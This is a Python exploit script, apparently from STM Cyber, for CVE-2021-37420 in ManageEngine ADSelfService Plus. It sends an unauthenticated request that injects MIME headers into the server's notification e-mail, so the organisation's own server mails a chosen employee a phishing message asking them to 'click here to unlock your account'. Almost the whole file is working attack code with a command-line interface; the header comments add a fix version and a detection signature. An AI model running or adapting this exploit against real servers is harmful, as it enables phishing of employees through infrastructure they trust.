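#
# STM Cyber R&D
# https://blog.stmcyber.com
#
# Exploit Title: ManageEngine ADSelfService Plus - E-mail MIME injection in /RestAPI/PasswordSelfServiceAPI endpoint
# Exploit Author: Krzysztof Andrusiak, Marcin Ogorzelski
# Vendor Homepage: https://www.manageengine.com/
# Software Link: https://www.manageengine.com/products/self-service-password/download.html
# Version: < 6112
# Tested on: Windows Server 2019
# CVE: CVE-2021-37420
#
# How it works: the script POSTs a ``selfServiceApproval`` request to
# ``/RestAPI/PasswordSelfServiceAPI``.  No session, cookie or API key is sent,
# i.e. the request is unauthenticated.  The ``ACTION_TO_PERFORM`` value is
# reflected into the notification e-mail ADSSP sends to ``USERNAME``; a value
# that carries newlines followed by MIME headers therefore lets the caller
# supply the whole mail body, so the victim receives attacker-controlled HTML
# from the organisation's own ADSSP server (a convincing phishing mail).
#
# NOTE(review): the HTML markup of the mail template (the anchor behind the
# word "here" and the tag used as a line break in get_payload_html) has been
# stripped from this copy of the exploit, presumably by the page extraction.
# Restore it before use; see HTML_LINE_BREAK and build_mail_content below.
#
# Defenders: builds 6112 and later are fixed (see "Version" above).  A POST to
# this endpoint whose ACTION_TO_PERFORM contains CR/LF, "MIME-Version:" or
# "Content-Type:" is a reliable detection signature for this technique.

from __future__ import annotations

import argparse
import sys

import requests

URL = "http://192.168.100.102:8888"  # ADSSP server (default, override with --url)
DOMAIN = "ALPHACORP.LOCAL"  # Domain name (default, override with --domain)
USERNAME = "victim"  # AD username (e-mail recipient; override with --username)

ENDPOINT = "/RestAPI/PasswordSelfServiceAPI"

# Response bodies ADSSP returns for this operation (localisation keys, not
# human-readable text), as observed by the original authors.
SUCCESS_KEY = "adssp.common.text.mail_sent_success"
NO_MAIL_KEY = "adssp.common.text.unable_send_notification"

# MIME boundary of the injected multipart body.  Any string that does not occur
# inside the HTML content works; this is the one the original exploit used.
MIME_BOUNDARY = "----=_Part_164_38720369.1615548866509"

# What each newline of the template is replaced with inside the HTML part.
# Presumably ``<br>`` in the original exploit; the tag was lost in this copy of
# the file (see NOTE above) — TODO confirm against the published exploit.
HTML_LINE_BREAK = "<br>"


def build_mail_content(username: str) -> str:
    """Return the mail body shown to *username*.

    The text is sent as ``text/html`` with ``Content-Transfer-Encoding: 7bit``
    (see get_payload_html), so keep it ASCII-only or switch the encoding.
    NOTE(review): the original markup around "here" (an anchor pointing at the
    attacker's page) is missing from this copy — restore it before use.
    """
    return f"""
Hello {username},

click here to unlock your account.

Best regards,

Administrator
"""


HTML_CONTENT = build_mail_content(USERNAME)  # Mail content


def get_payload_html(html: str, line_break: str = HTML_LINE_BREAK) -> str:
    """Return the MIME part (headers, blank line, body) that carries *html*.

    CRs are dropped and every LF is replaced by *line_break* so the template's
    line structure survives HTML rendering (a raw newline collapses to
    whitespace in an HTML mail).  The part ends with two newlines so the
    closing boundary written by get_payload starts on its own line.

    Args:
        html: HTML text of the mail body; must be 7-bit clean for the declared
            ``Content-Transfer-Encoding``.
        line_break: replacement for each ``\\n`` in *html*.
    """
    body = html.replace("\r", "").replace("\n", line_break)
    part = [
        "Content-Type: text/html;charset=UTF-8",
        "Content-Transfer-Encoding: 7bit",
        "",  # blank line terminates the part headers
        body,
        "",
        "",
    ]
    return "\n".join(part)


def get_payload(html: str, boundary: str = MIME_BOUNDARY) -> str:
    """Return the value injected through ``ACTION_TO_PERFORM``.

    The value is reflected into the e-mail ADSSP builds (presumably into its
    header section): the leading newline ends the header the server is writing
    and the lines that follow are parsed as headers of our own, turning the
    mail into a ``multipart/mixed`` message whose single part is *html*.

    Args:
        html: HTML text of the mail body (see get_payload_html).
        boundary: MIME boundary string; must not occur inside *html*.
    """
    head = "\n".join([
        "",  # terminates the server-written header line we land in
        "MIME-Version: 1.0",
        f'Content-Type: multipart/mixed; boundary="{boundary}"',
        "",  # blank line ends the mail headers, body starts below
        f"--{boundary}",
        "",
    ])
    return head + get_payload_html(html) + f"--{boundary}--\n"


def send_phishing_mail(
    url: str,
    domain: str,
    username: str,
    html: str,
    *,
    timeout: float = 60.0,
    verify: bool = True,
) -> tuple[int, str]:
    """POST the injected payload and return ``(status_code, stripped body)``.

    The request carries no credentials of any kind; the endpoint accepts it
    unauthenticated on vulnerable builds.

    Args:
        url: base URL of the ADSSP server (trailing slash optional).
        domain: AD domain name the target account belongs to.
        username: AD username of the mail recipient.
        html: mail body, passed through get_payload.
        timeout: socket timeout in seconds; mail delivery happens server-side
            before the response, so allow for it.
        verify: TLS certificate verification for https targets.

    Raises:
        requests.RequestException: on connection/timeout/TLS errors.
    """
    params = {
        "operation": "selfServiceApproval",
        "DOMAIN_NAME": domain,
        "USERNAME": username,
        "ACTION_TO_PERFORM": get_payload(html),
    }
    response = requests.post(
        url.rstrip("/") + ENDPOINT,
        data=params,
        timeout=timeout,
        verify=verify,
    )
    return response.status_code, response.text.strip()


def main(argv: list[str] | None = None) -> int:
    """Command-line entry point; returns the process exit status."""
    parser = argparse.ArgumentParser(
        description="CVE-2021-37420: send a phishing e-mail through ADSelfService Plus",
    )
    parser.add_argument("--url", default=URL, help="ADSSP base URL")
    parser.add_argument("--domain", default=DOMAIN, help="AD domain name")
    parser.add_argument("--username", default=USERNAME, help="AD username (recipient)")
    parser.add_argument("--timeout", type=float, default=60.0, help="request timeout in seconds")
    parser.add_argument("--insecure", action="store_true", help="skip TLS certificate verification")
    args = parser.parse_args(argv)

    print(f"[*] Sending phishing e-mail to {args.username} user.")
    try:
        status, text = send_phishing_mail(
            args.url,
            args.domain,
            args.username,
            build_mail_content(args.username),
            timeout=args.timeout,
            verify=not args.insecure,
        )
    except requests.RequestException as exc:
        # Connection refused, timeout, TLS failure: report instead of a traceback.
        print(f"[-] Request failed: {exc}")
        return 2

    if text == SUCCESS_KEY:
        print("[+] Done.")
        return 0
    if text == NO_MAIL_KEY:
        print("[-] Unable to send notification - does user have e-mail set in AD?")
        return 1
    print("[-] Something went wrong.")
    # A patched build or a non-ADSSP host answers with something else entirely;
    # show enough of it to tell the two apart.
    print(f"    HTTP {status}: {text[:200]!r}")
    return 1


if __name__ == "__main__":
    sys.exit(main())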